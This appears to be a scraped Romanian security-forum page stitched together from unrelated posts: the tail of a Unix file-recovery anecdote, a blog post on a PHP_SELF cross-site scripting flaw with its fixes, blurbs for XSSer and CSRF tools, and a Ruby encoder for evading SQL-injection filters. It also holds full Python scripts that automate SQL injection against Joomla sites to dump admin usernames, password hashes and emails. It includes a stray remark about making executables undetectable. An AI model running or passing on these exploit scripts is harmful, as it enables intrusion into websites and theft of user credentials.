recovered the contents of /bin across the ether (it's amazing how much you come to miss ls after just a few, short hours), and selected files from /etc. The key file was /etc/rrestore, with which we recovered /dev from the dump tape, and the rest is history. Now, you're asking yourself (as I am), what's the moral of this story? Well, for one thing, you must always remember the immortal words, DON'T PANIC. Our initial reaction was to reboot the machine and try everything as single user, but it's unlikely it would have come up without /etc/init and /bin/sh. Rational thought saved us from this one. The next thing to remember is that UNIX tools really can be put to unusual purposes. Even without my gnuemacs, we could have survived by using, say, /usr/bin/grep as a substitute for /bin/cat. And the final thing is, it's amazing how much of the system you can delete without it falling apart completely. Apart from the fact that nobody could login (/bin/login?), and most of the useful commands had gone, everything else seemed normal. Of course, some things can't stand life without say /etc/termcap, or /dev/kmem, or /etc/utmp, but by and large it all hangs together. I shall leave you with this question: if you were placed in the same situation, and had the presence of mind that always comes with hindsight, could you have got out of it in a simpler or easier way? Answers on a postage stamp to: Mario Wolczko ------------------------------------------------------------------------ Dept. of Computer Science ARPA: miw%uk.ac.man.cs.ux@cs.ucl.ac.uk The University USENET: mcvax!ukc!man.cs.ux!miw Manchester M13 9PL JANET: miw@uk.ac.man.cs.ux U.K. 061-273 7121 x 5699 ------------------------------------------------------------------------ Hacker's Wisdom: Unix RecoveryLegend Last modified: Thu Mar 7 13:47:40 EST 1996 http://www.ee.ryerson.ca:8080/~elf/hack/recovery.htmlSursa: *THE* classic Unix horror story | WSU Linux Users Group

Acceptabil

Fuck http://127.0.0.1/test.php/"><script>alert(1)</script>

Update: Lege pentru de?in?torii cartelelor prepay. Ace?tia ar putea fi obliga?i s?-?i declare datele personale - Reporter NTV - Stiri Constanta

[h=2]A XSS Vulnerability in Almost Every PHP Form I’ve Ever Written[/h] I've spent a lot of time over the past few months writing an enterprise application in PHP. Despite what some people may say, I believe that PHP is as secure or insecure as the developer who is writing the code. Anyway, I'm at the point in my development lifecycle where I decided that it was ready to run an application vulnerability scanner against it. What I found was interesting and I think it's worth sharing with you all. Let me preface this by saying that I'm the guy who gives the training to our developers on the OWASP Top 10, writing secure code, etc. I'd like to think that I have a pretty good handle on programming best practices, input validation, and HTML encoding. I built all kinds of validation into this application and thought that the vulnerability scan would come up empty. For the most part I was right, but there was one vulnerability, one flaw in particular, that found it's way into every form in my application. In fact, I realized that I've made this exact same mistake in almost every PHP form that I've ever written. Talk about a humbling experience. So here's what happened. I created a simple page with a form where the results of that form are submitted back to the page itself for processing. Let's assume it looks something like this: <html> <body> <?php if (isset($_REQUEST['submitted']) && $_REQUEST['submitted'] == '1') { echo "Form submitted!"; } ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>"> <input type="hidden" name="submitted" value="1" /> <input type="submit" value="Submit!" /> </form> </body> </html> It looks fairly straightforward, right? The problem has to do with that $_SERVER['PHP_SELF'] variable. The intent here is that PHP will display the path and name of the current page so that the form knows to submit back to the same page. The problem is that $_SERVER['PHP_SELF'] can actually be manipulated by the user. Let's say as the user I change the URL from http://www.webadminblog.com/example.php to http://www.webadminblog.com/example.php"><script>alert('xss');</script> This will end the form action part of the code and inject a javascript alert into the page. This is the very definition of cross site scripting. I can't believe that with as long as I've been writing in PHP and as long as I've been studying application security, I've never realized this. Fortunately, there are a couple of different ways to fix this. First, you could use the HTML entities or HTML special character functions to sanitize the user input like this: htmlentities($_SERVER['PHP_SELF]); htmlspecialchars($_SERVER['PHP_SELF]); This fix would still allow the user to manipulate the URL, and thus, what is displayed on the page, but it would render the javascript invalid. The second way to fix this is to use the script name variable instead like this: $_SERVER['SCRIPT_NAME']; This fix would just echo the full path and filename of the current file. Yes, there are other ways to fix this. Yes, my code example above for the XSS exploit doesn't do anything other than display a javascript alert. I just wanted to draw attention to this issue because if it's found it's way into my code, then perhaps it's found it's way into yours as well. Happy coding! Sursa: A XSS Vulnerability in Almost Every PHP Form I’ve Ever Written | Web Admin Blog Nota: Nu pare sa mearga din motive evicente: The requested URL /test.php"><script>alert(1)</script> was not found on this server. Voua va merge?

Dam tag: @jetu ? PS: Acele linii de cod "inutile" sunt probabil utile pentru ca executabilul sa fie FUD.

[h=2]BlindElephant Web Application Fingerprinter[/h] The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable. Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/ Discussion and Forums: http://www.qualys.com/blindelephant License: LGPL [h=3]Getting Started[/h] BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program. [h=4]Pre-requisites:[/h] Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant. [h=4]Get the code:[/h] Browse SVN Checkout via SVN:svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant Download: BlindElephant Web Application Fingerprinter

[h=1]Introduction[/h] Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection. [h=1]Current version[/h] [TABLE] [TR] [TD]XSSer v1.6b ("The Mosquito: Grey Swarm!"). +Click for Zoom Download original source code: XSSer v1.6 -beta- Ubuntu/Debian package: XSSer-1.6_all.deb ArchLinux package: AUR link (v1.6b) Gentoo package: XSSer Gentoo ebuild (v1.6b) RPM package: XSSer-1.6-1.noarch.rpm Or update your copy directly from the XSSer -Subversion- repository: $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser This version include more features on the GTK+ interface: [/TD] [/TR] [TR] [TD] [TABLE] [TR] [TD] +Click for Zoom [/TD] [TD] +Click for Zoom [/TD] [/TR] [TR] [TD] +Click for Zoom [/TD] [TD] +Click for Zoom [/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] TIP: type: 'xsser --gtk' to start from shell. Or run directly XSSer from menu Download: XSSer: automatic tool for pentesting XSS attacks against different applications

pinata-csrf-tool Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTTP request. [h=2]Overview:[/h]-WARNING - THIS IS NOT A POINT AND CLICK TOOL. YOU SHOULD KNOW WHAT YOU ARE DOING TO USE THIS TOOL. - The tool will generate proof of concept CSRF HTML given an HTTP request. It will automatically check whether it is a GET or a POST request and with further validation for standard POST and Multipart/form POST. - The tool will then create an HTML corresponding to the type of the request. - The GET CSRF HTML includes IMG tag with SRC set to the URL being tested. - The POST CSRF HTML is created with auto submit java script form with names and values from the HTTP request. Download: https://code.google.com/p/pinata-csrf-tool/

# Ruby Script to generate URL encoded Unicode UTF-8 URL. # Author: Gary O'leary-Steele of Sec-1 Ltd # Example: # The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack # %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d # Ruby Script to generate URL encoded Unicode UTF-8 URL. # Author: Gary O'leary-Steele of Sec-1 Ltd # Example: # The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack # %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d # # require 'uri' def unicode_url(string) lookuptable = Hash.new lookuptable ={ ' ' => '%u0020', '/' => '%u2215', '\\' => '%u2215', "'" => '%u02b9', '"' => '%u0022', '>' => '%u003e', '<' => '%u003c', '#' => '%uff03', '!' => '%uff01', '$' => '%uff04', '*' => '%uff0a', '@' => '%u0040', '.' => '%uff0e', '_' => '%uff3f', '(' => '%uff08', ')' => '%uff09', ',' => '%uff0c', '%' => '%u0025', '-' => '%uff0d', ';' => '%uff1b', ':' => '%uff1a', '|' => '%uff5c', '&' => '%uff06', '+' => '%uff0b', '=' => '%uff1d', 'a' => '%uff41', 'A' => '%uff21', 'b' => '%uff42', 'B' => '%uff22', 'c' => '%uff43', 'C' => '%uff23', 'd' => '%uff44', 'D' => '%uff24', 'e' => '%uff45', 'E' => '%uff25', 'f' => '%uff46', 'F' => '%uff26', 'g' => '%uff47', 'G' => '%uff27', 'h' => '%uff48', 'H' => '%uff28', 'i' => '%uff49', 'I' => '%uff29', 'j' => '%uff4a', 'J' => '%uff2a', 'k' => '%uff4b', 'K' => '%uff2b', 'l' => '%uff4c', 'L' => '%uff2c', 'm' => '%uff4d', 'M' => '%uff2d', 'n' => '%uff4e', 'N' => '%uff2e', 'o' => '%uff4f', 'O' => '%uff2f', 'p' => '%uff50', 'P' => '%uff30', 'q' => '%uff51', 'Q' => '%uff31', 'r' => '%uff52', 'R' => '%uff32', 's' => '%uff53', 'S' => '%uff33', 't' => '%uff54', 'T' => '%uff34', 'u' => '%uff55', 'U' => '%uff35', 'v' => '%uff56', 'V' => '%uff36', 'w' => '%uff57', 'W' => '%uff37', 'x' => '%uff58', 'X' => '%uff38', 'y' => '%uff59', 'Y' => '%uff39', 'z' => '%uff5a', 'Z' => '%uff3a', '0' => '%uff10', '1' => '%uff11', '2' => '%uff12', '3' => '%uff13', '4' => '%uff14', '5' => '%uff15', '6' => '%uff16', '7' => '%uff17', '8' => '%uff18', '9' => '%uff19'} # Convert string to array of chars chararray = string.scan(/./) newstr = String.new chararray.each do |c| if lookuptable.has_key? c newstr = newstr + lookuptable[c] else newstr = newstr + URI.escape(c) end end return newstr end print "Enter string to URL Unicode:" puts unicode_url(gets) Download: unicode-fun.txt ? Packet Storm

Joomla SQL Injection Exploiter # Features: #- Check if URL is reachable #- Fuzz amount of columns (needed for UNION SELECT attack) #- Show a sample exploitation URL for pasting into the browser #- Showing the Joomla users from the table jos_users (with password hashes) #- Display current database, db user and db version # The Automated Joomla SQL Injection Exploiter is able to # exploit most of the SQL injection vulnerabilities which were ever # fdiscovered for Joomla or it's components, modules and plugins. # Simply hand over a vulnerable URL to this tool and receive the # admin login data of the vulnerable Joomla installation. #!/usr/bin/python# Automated Joomla SQL Injection Exploiter # by Valentin Hoebel (valentin@xenuser.org) # Version 1.0 (23th May 2010) # # This tool is based on my column fuzzer # ASCII FOR BREAKFAST # # # About the tool # ---------------------------------------------------------------------------------- # Features: #- Check if URL is reachable #- Fuzz amount of columns (needed for UNION SELECT attack) #- Show a sample exploitation URL for pasting into the browser #- Showing the Joomla users from the table jos_users (with password hashes) #- Display current database, db user and db version # The Automated Joomla SQL Injection Exploiter is able to # exploit most of the SQL injection vulnerabilities which were ever # fdiscovered for Joomla or it's components, modules and plugins. # Simply hand over a vulnerable URL to this tool and receive the # admin login data of the vulnerable Joomla installation. # # With this tool it is no longer necessary to write new exploits for new # Joomla (components/modules/plugins) vulnerabilities! # Usage example: # python joomla_sqli_sploiter.py - u "http://target/index.php?option=com_component?id=1" # The tool tries to exploit SQL injection vulnerabilities by using UNION SELECT. Therefore # it is necessary to fuzz the number of columns. # If this is successfull, the tool crafts a SQL injection URL for reading out the Joomla user table. # # Since most of the stuff is dynamic this tool can be enhanced easely to do also other things. # Feel free to use, modify, distribute and share this code as you like! Power to teh cows! # This tool war written for educational purposes only. I am not responsible for any damage # you might cause using this tool. Know and respect your local laws! # Only use this tool on websites you are allowed to test # Greetz && THX # ---------------------------------------------------------------------------------- # Special greetings to cr4wl3r (you know why !) # Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn (especially to /JosS) and the Packet Storm staff! # Thanks osvdb staff + moderators for your daily work! There are many people who appreciate what you are doing! # # Power to the cows! import sys, re, urllib, urllib2, string from urllib2 import Request, urlopen, URLError, HTTPError # Define the max. amounts for trying max_columns = 100 # Prints usage def print_usage(): print "" print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" print "" print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " Exploits almost every SQL injection vulnerability which was ever discovered" print " for Joomla and it's components/modules/plugins. It works also for feature(new)" print " vulnerabilities, so no new exploits are needed!" print "" print " Simply give this tool the vulnerable URL and receive the Joomla user table!" print "" print " Usage:" print " -u <URL> (e.g. -u \"http://target/index.php?option=com_vulnerable&katid=1\")" print " --help (displays this text)" print "" print "" print " Features:" print " - Check if URL is reachable" print " - Fuzz amount of columns (needed for UNION SELECT attack)" print " - Show a sample exploitation URL for pasting into the browser" print " - Showing the Joomla users from the table jos_users (with password hashes)" print " - Display current database, db user and db version" print "" print " For educational purposes only! I am not responsible if you cause any damage!" print " Only use this tool on websites which you may test, e.g. for penetration testing." print "" print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" print "" print "" return #Prints banner def print_banner(): print "" print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" print "" print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " For educational purposes only! I am not responsible if you cause any damage!" print " Only use this tool on websites which you may test, e.g. for penetration testing." print "" print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" print "" return # Testing if URL is reachable, with error handling def test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print ">> The connection could not be established." print ">> Error code: ", e.code print ">> Exiting now!" print "" sys.exit(1) except URLError, e: print ">> The connection could not be established." print ">> Reason: ", e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities def find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "+from+jos_users--" column_finder_url_terminator_2 = "--" next_column = "," column_finder_url_sample_2 = "concat_ws(0x3b,user(),database(),version())" column_finder_url_sample_3 = "concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321)" column_finder_url_sample = "concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321)" # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message print ">> Assuming that your provided URL is vulnerable." print ">> Trying to find the correct number of columns... (this may take a while)" for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html) # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ", number_of_columns # Offer to display a sample exploitation URL for pasting into the browser print "" user_reply = str(raw_input(">> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": # Print a sample URL for exploiting and replace test string with some useful stuff print "" final_check_url3 = final_check_url+column_finder_url_terminator_2 print string.replace(final_check_url3, column_finder_url_message, column_finder_url_sample_2) print "" print ">> Simply copy and paste this link into your browser Moving on..." else: print ">> Viewing a sample exploitation URL was skipped!" # Craft our exploit query malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print ">> Now assuming that this is a Joomla installation." print ">> Trying to fetch the first user of the Joomla user table..." # Receive the first user of the Joomla user table response = urllib2.urlopen(malicious_query) html = response.read() get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html = html[get_secret_data :] new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!") new_html_2 = new_html[:new_get_secret_data] # Data was received, now format and display it formatted_output = str.split(new_html_2, ";") print "ID: ", formatted_output[1:2] print "Name: ", formatted_output[2:3], "Username: ", formatted_output[3:4] print "Password Hash: ", formatted_output[4:5] print "E-Mail Address: ", formatted_output[5:6], "User status: ", formatted_output[6:7] # Offer to display all entries of the Joomla user table print "" user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" print "-------------------------------------------------------------" print str.split(new_html, ";") print "-------------------------------------------------------------" print "The seperator for the single entries is: ", column_finder_url_message_plain print "So it is this pattern: seperator id;name;username;password;email address;user status seperator" print "I know, formatting is bad, but this will be improved soon." else: print ">> Viewing the Joomla user table output was skipped!" # Offer to display current database, user and MySQL version print "" user_reply = str(raw_input(">> Do you want to display the current database, database user and MySQL version? (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": # Crafting the final URL final_check_url4 = final_check_url+column_finder_url_terminator_2 informative_query = string.replace(final_check_url4, column_finder_url_message, column_finder_url_sample_3) # Getting the data response4 = urllib2.urlopen(informative_query) html4 = response4.read() # Now extract the interesting information get_secret_data = string.find(html4, "P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html4 = html4[get_secret_data :] new_get_secret_data4 = string.find(new_html4, "P0w3r t0 t3h c0ws!") new_html_5 = new_html4[:new_get_secret_data4] # Data was received, now format and display it formatted_output = str.split(new_html_5, ";") print "MySQL Database User: ", formatted_output[1:2] print "MySQL Database: ", formatted_output[2:3] print "MySQL Version: ", formatted_output[3:4] print "That's it. Bye!" print "" print "" sys.exit(1) else: print ">> Viewing the informative data was skipped!" print "That's it. Bye!" print "" print "" sys.exit(1) # Increment counter var by one number_of_columns += 1 #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?" print "Bye!" print "" print "" # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1) for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start with finding the correct amount of columns find_columns() ### EOF ### Download: http://www.xenuser.org/exploits/joomla_sqli_sploiter.py

Column fuzzer # Full Automated Column Finder for SQL Injection # Column fuzzer, version 1.1 (23th May 2010) # By Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # # Useful for SQL Injections. The script tries to determine the amount # of columns needed for a successfull SQL Injection, e.g. # target/index.php?id=1+AND+1=2+UNION+SELECT+1,2-- #!/usr/bin/python# Full Automated Column Finder for SQL Injection # Column fuzzer, version 1.1 (23th May 2010) # By Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # # Useful for SQL Injections. The script tries to determine the amount # of columns needed for a successfull SQL Injection, e.g. # target/index.php?id=1+AND+1=2+UNION+SELECT+1,2-- # # You may copy, modify and use this code without asking me for permission # Share it, use it! # For educational purposes only. I am not responsible for any damage you might # cause with this script. # # Thanks to rsauron from darkc0de for the awesome Python scripts! # Greetz to cr4wl3r (you know why ! ) && all my friends and ppl who support me! # # # Usage: python column_finder.py -u http://target-domain.tld/file.php?some_var=some_integer # Example: # python column_finder.py -u http://127.0.0.1/index.php?=id=1 # Don't forget to supply a correct value for the var or script won't work (e.g. id=1, but NOT id=)! # # # Changelog: # ------------------------------------------------- # Version 1.1 - 23th May 2010 # - Some small changes # # Version 1- 22th May 2010 # - Public release import sys, re, urllib, urllib2, string from urllib2 import Request, urlopen, URLError, HTTPError # Define the max. amounts for trying max_columns = 100 # Prints usage def print_usage(): print "" print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>" print "Full Automated Column Finder for SQL Injection by Valentin Hoebel (valentin@xenuser.org)" print "Version: 1.1 (23th May 2010)" print "Usage:" print " -u <URL> (e.g. -u http://target/index.php?id=1)" print " --help (displays this text)" print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<" print "" print "" return #Prints banner def print_banner(): print "" print "" print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>" print "" print "Full Automated Column Finder for SQL Injection" print "by Valentin Hoebel (valentin@xenuser.org)" print "" print "Version: 1.1 (23th May 2010)" print "" print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<" print "" return # Testing if URL is reachable, with error handling def test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print ">> The connection could not be established." print ">> Error code: ", e.code print ">> Exiting now!" print "" sys.exit(1) except URLError, e: print ">> The connection could not be established." print ">> Reason: ", e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return # Find correct amount of columns for the SQL Injection def find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "--" next_column = "," column_finder_url_sample = "concat(user(),database(),version())" print ">> Trying to find the correct number of columns..." # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html) # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ", number_of_columns # Ask if a sample URL should be provided user_reply = str(raw_input(">> Do you want to have a sample URL for exploiting? (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" # Print a sample URL for exploiting and replace test string with some useful stuff print string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print "Simply copy and paste this link into your browser Have fun! Bye :)" print "" print "" sys.exit(1) else: print ">> Ok, bye =)" print "" print "" sys.exit(1) # Increment counter var by one number_of_columns += 1 #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?" # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1) for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start with finding the correct amount of columns find_columns() print "" print "" ### EOF ### Download: http://xenuser.org/tools/column_finder.py